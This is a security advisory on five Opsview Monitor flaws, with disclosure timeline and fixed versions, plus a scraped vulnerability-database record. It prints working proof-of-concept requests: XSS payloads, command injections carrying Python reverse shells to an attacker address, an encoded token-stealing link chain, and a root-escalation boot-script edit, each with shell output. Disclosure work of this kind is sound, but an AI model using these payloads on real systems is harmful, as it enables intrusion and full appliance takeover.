/----- GET /rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401; auth_tkt=ODFlYjc4YjVlN2M5ZmQ2MDUyNzhlMTEyZTM1ZjRmODM1YWI5ODUzMGFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 -----/
7.2. Persistent Cross-Site Scripting in Settings endpoint
[CVE-2018-16147] The 'data' parameter of the '/settings/api/router' endpoint is vulnerable to Cross-Site Scripting. The following proof of concept demonstrates the vulnerability:
/----- POST /settings/api/router?_dc=1521575692128 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:///settings/ x-opsview-username: rifle x-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 506 Cookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256; auth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D Connection: close
[{"action":"SettingsServer","method":"setObjecttypeState","data":["alert(4)","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":2},{"action":"SettingsServer","method":"setObjecttypeState","data":["profile","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":3}] -----/
The input will be stored without any sanitization and rendered every time the /settings section is visited by the user. It's important to point that this XSS is self stored and it's executed only in the context of the victim's session. However, this vulnerability can be exploited by an attacker to gain persistency and execute the malicious code each time the victim accesses to the settings section. Excerpt of the source code showing the injected script tag:
/----- [{"property":"name","root":"data","direction":"ASC"}]}},"contact":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"name","root":"data"}]}},"alert(4)":{"storeState":{"sorters":[{"root":"data","property":"name","direction":"ASC"}],"pageSize":50,"filters":[],"page":1}},"hostcheckcommand":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"priority","root":"data"}]}},"netflow_collector":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"page":1,"filters":[],"pageSize":50}},"alert(4)":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}]," -----/
7.3.
The following proof of concept executes a reverse shell:
/----- POST /rest/config/notificationmethod/testnotification?_dc=1520444703477 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:///settings/ x-opsview-username: admin x-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 376 Cookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0; opsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13; auth_tkt=MDA1M2JmODhmYTlmNWM1NDEyNzM3ZWRiYWJiMTBmZTA1YWEwMWY0M2FkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D Connection: close
{"message":"Test Message","command":"submit_xmpp_script","variables":[],"test_variables":[{"name":"PAGER","value":"123123123 || python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"}],"id":"20"} -----/
/----- nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [] port 16000 [tcp/*] accepted (family 2, sport 43016) $ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) -----/
Additionally, it is possible to combine this issue with a redirection functionality within the management console and the vulnerability described in 7.1 (Reflected Cross-Site Scripting), to build a specially crafted link that could be sent to an administrator to trigger a reverse shell.
In order to perform the attack, consider the following:
. API's sensitive actions require a 'restToken' to be processed. This token could be obtained by a Cross-Site Scripting attack from a specific endpoint (/settings). Abuse the login page redirection functionality to force the user to access the Cross-Site Scripting vulnerable URL described in 7.1 (you may also abuse the Cross-Site scripting vulnerability reported in https://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). If the user is already authenticated he will be automatically redirected. Otherwise, the login page will appear and the redirection will take place after a successful login.
The following proof of concept presents a crafted link that could trigger a reverse shell if accessed by an administrator:
/----- https:///login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%2FOiIpLzt1c2VybmFtZSA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3ZhciB4aHIyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7eGhyMi5vcGVuKCdQT1NUJywgJy9yZXN0L2NvbmZpZy9ub3RpZmljYXRpb25tZXRob2QvdGVzdG5vdGlmaWNhdGlvbi8nLCB0cnVlKTt4aHIyLnNldFJlcXVlc3RIZWFkZXIoIngtb3Bzdmlldy11c2VybmFtZSIsIHVzZXJuYW1lKTtjb25zb2xlLmxvZyh1c2VybmFtZSk7Y29uc29sZS5sb2codG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigieC1vcHN2aWV3LXRva2VuIiwgdG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb24iKTtib2R5ID0geyJtZXNzYWdlIjoiVGVzdCBNZXNzYWdlIiwiY29tbWFuZCI6InN1Ym1pdF94bXBwX3NjcmlwdCIsInZhcmlhYmxlcyI6W10sInRlc3RfdmFyaWFibGVzIjpbeyJuYW1lIjoiUEFHRVIiLCJ2YWx1ZSI6IjEyMzEyMzEyMyB8fCBweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKFwiPGF0dGFja2VySVA%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1 -----/
Once clicked, the authenticated administrator will be redirected to the vulnerable section where his browser will perform a request to the '/settings' endpoint in order to obtain a valid 'restToken'. Finally, using that token, the API request to 'rest/config/notificationmethod/testnotification' will be exploited thus resulting in a reverse shell.
7.4. Rancid test connection functionality abuse leading to command execution
[CVE-2018-16144] NetAudit is a section within Network Analyzer that allows the user to automate the backing up of network devices' configuration files to a centralized location. The test connection functionality is vulnerable to command injection due to an improper sanitization of the 'rancid_password' parameter.
The following proof of concept executes a reverse shell:
/----- POST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:///settings/ x-opsview-username: admin x-opsview-token: b3d716e0157fd6337e6978220188051d8c578850 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 434 Cookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f; auth_tkt=ZTJlMWFlODQ4ZTVhYmJiN2I3YTQzNWYxNzkzYjAxYWU1YWIxNGI1NWFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D Connection: close
ip=++++++&rancid_vendor=1&rancid_username=234234+add+password+xxxxx&rancid_connection_type=telnet&rancid_autoenable=1&rancid_password=2342342342+%3b+sleep%2011%3b%20python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("<attackerIP>",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'&host_id=2
-----/
/----- nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [] port 16000 [tcp/*] accepted (family 2, sport 43016) $ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) $ uname -a Linux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux -----/
7.5. Script modification could allow local privilege escalation
[CVE-2018-16145] Most of the services in Opsview Monitor run with nagios privileges and the scripts that run at boot time, impersonate nagios user during its execution. However, the '/etc/init.d/opsview-reporting-module' script invokes the '/opt/opsview/jasper/bin/db_jasper' script before dropping root privileges.
The following excerpt shows the vulnerable code:
/----- /etc/init.d/opsview-reporting-module:
/opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null if [ $? != 0 ]; then echo "Attempted to start jasperserver but MySQL credentials are wrong." exit 0 fi
DAEMON=/opt/opsview/jasper/bin/rc.jasperserver
test -x $DAEMON || exit 0
Switch to opsview user if run as root
id | grep "uid=0(" >/dev/null if [ $? = 0 ] ; then su - opsview -c "$DAEMON $@" else exec $DAEMON $@ fi -----/
The file '/opt/opsview/jasper/bin/db_jasper', which is invoked by the vulnerable script, can be edited by the nagios user which belongs to the 'opsview' group.
/----- ls -ltr /opt/opsview/jasper/bin/db_jasper -rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017 /opt/opsview/jasper/bin/db_jasper nagios@image-builder-299:/home/admin$ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) -----/
Since 'db_jasper' receives 'db_exists' as an argument, which is later used in a case statement, an attacker could edit that specific part of the script in order to execute arbitrary code once the appliance is rebooted.
The following excerpt shows the attacker's bash script which, after execution, will trigger a reverse shell with root privileges:
/----- while [ "x$1" != "x" ] ; do case "$1" in db_export) db_export ;; db_export_test) db_export_test ;; db_export_initial) TEST=1 db_backup ;; db_import) db_import ;; db_install) db_install ;; db_backup) db_backup ;; db_restore) db_restore ;; db_exists) python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' & db_exists exit $? ;; db_upgrade) db_upgrade exit $? ;; *) die "Usage: $0 {db_export|db_import|db_install|db_backup|db_restore}" ;;
esac
shift
done -----/
/----- $nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [] port 16000 [tcp/*] accepted (family 2, sport 45566)
id
uid=0(root) gid=0(root) groups=0(root) -----/
- Report Timeline
2018-05-03: Core Security sent an initial notification to Opsview, asking for GPG keys in order to send draft advisory. 2018-05-04: Opsview replied attaching its GPG keys. 2018-05-04: Core Security sent the encrypted draft advisory. 2018-05-04: Opsview confirmed the reception of the advisory and informed an initial response would be ready by May 11th. 2018-05-11: Opsview replied saying they were able to reproduce all of the reported vulnerabilities and confirmed that they were present in all supported versions of Opsview Monitor (5.4, 5.3 and 5.2). In addition, Opsview informed that were planning to release a fix for these versions by the end of July. 2018-05-11: Core Security thanked the confirmation. 2018-06-25: Opsview informed that they were planning to release a major update for the product (6.0) at the end of July. This update will address all reported vulnerabilities. Also, they informed that the previous versions of the product would be fixed by the end of August. 2018-06-27: Core Security thanked the status update and asked for a tentative public disclosure date. 2018-07-16: Core Security requested a status update. 2018-07-18: Opsview proposed to set a tentative publication date by the end of August when they release the fixes for its earlier versions. 2018-07-18: Core Security agreed with the Opsview's proposal. 2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0 release will be available on July 25th. In addition, they informed that they didn't have the exact release date for the updates to previous versions of the product. 2018-08-06: Core Security requested a status update for the remaining fixes. 2018-08-13: Opsview replied saying that they were targeting the week of August 24th for release the fixes of their earlier product versions and they would confirm the exact date at the end of the next week. 2018-08-13: Core Security thanked the reply. 2018-08-24: Opsview informed Core Security that the remaining fixed versions will be available on August 29th. 2018-08-24: Core Security thanked the update and proposed September 4th as the coordinated release date. 2018-08-28: Opsview agreed on the proposed release date. 2018-09-04: Advisory CORE-2018-0008 published.
- References
[1] https://www.opsview.com/solutions
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201809-0904",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "opsview",
"scope": "gte",
"trust": 1.0,
"vendor": "opsview",
"version": "5.4.0"
},
{
"model": "opsview",
"scope": "lt",
"trust": 1.0,
"vendor": "opsview",
"version": "5.4.2"
},
{
"model": "opsview",
"scope": "lt",
"trust": 0.8,
"vendor": "opsview",
"version": "5.4.x"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.8,
"vendor": "opsview",
"version": "5.4.2"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.4"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.3"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.2"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17453"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010274"
},
{
"db": "NVD",
"id": "CVE-2018-16146"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.4.2",
"versionStartIncluding": "5.4.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16146"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Fernando Diaz, Fernando Catoira",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
}
],
"trust": 0.1
},
"cve": "CVE-2018-16146",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-16146",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-17453",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-16146",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-16146",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-17453",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201809-155",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-16146",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17453"
},
{
"db": "VULMON",
"id": "CVE-2018-16146"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010274"
},
{
"db": "NVD",
"id": "CVE-2018-16146"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-155"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The web management console of Opsview Monitor 5.4.x before 5.4.2 provides functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The value parameter is not properly sanitized, leading to arbitrary command injection with the privileges of the nagios user account. Opsview Monitor The monitor contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. OpsviewMonitor is a virtual appliance designed to be deployed in an organization\u0027s network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. OpsviewMonitor has a command execution vulnerability that allows an attacker to obtain command execution on the system as a nagios user. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nOpsview Monitor Multiple Vulnerabilities\n\n1. **Advisory Information**\n\nTitle: Opsview Monitor Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0008\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities\nDate published: 2018-09-04\nDate of last update: 2018-09-04\nVendors contacted: Opsview\nRelease mode: Coordinated release\n\n2. **Vulnerability Information**\n\nClass: Improper Neutralization of Input During Web Page Generation\n[CWE-79], Improper Neutralization of Input During Web Page Generation\n[CWE-79], Improper Neutralization of Special Elements used in an OS\nCommand [CWE-78], Improper Neutralization of Special Elements used in\nan OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144,\nCVE-2018-16145\n\n3. **Vulnerability Description**\n\nOpsview\u0027s website states that:\n\nOpsview[1] builds monitoring software that helps DevOps understand how\nthe performance of their hybrid IT infrastructure \u0026 apps impacts\nbusiness service delivery. Opsview Monitor supports +3500 Nagios plugins\nand service checks making it easy to monitor everything from Docker and\nVMware to Amazon Web Services, Hyper-V and more. \n\n4. **Vulnerable Packages**\n\n . Opsview Monitor 5.4\n . Opsview Monitor 5.3\n . Opsview Monitor 5.2\n\nOther products and versions might be affected, but they were not tested. \n\n5. **Vendor Information, Solutions and Workarounds**\n\nOpsview released the following versions of its product that fix the\nreported issues. Opsview Monitor 6.0\n . Opsview Monitor 5.4.2\n . Opsview Monitor 5.3.1\n\nIn addition, Opsview published the following release notes:\n\n . https://knowledge.opsview.com/v5.4/docs/whats-new\n . https://knowledge.opsview.com/v5.3/docs/whats-new\n\n6. **Credits**\n\nThese vulnerabilities were discovered and researched by Fernando Diaz\nand Fernando Catoira from Core Security Consulting Services. The\npublication of this advisory was coordinated by Leandro Cuozzo from Core\nAdvisories Team. \n \n7. \nMultiple vulnerabilities were found in the context of this appliance,\nwhich could allow a remote attacker to compromise the system. \nVulnerabilities described in 7.1 and 7.2 could be abused to execute\nmalicious JavaScript code in the context of a legitimate user. Finally, the\nissue found in one of the scripts run during the boot process presented\nin 7.5 would allow attackers to elevate their privileges from nagios\nuser to root after a system restart, hence obtaining full control of the\nappliance. \n\n7.1. **Reflected Cross-Site Scripting in Diagnostics**\n\n[CVE-2018-16148] The \u0027diagnosticsb2ksy\u0027 parameter of the \u0027/rest\u0027\nendpoint is vulnerable to Cross-Site Scripting. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1\nHTTP/1.1\nHost: 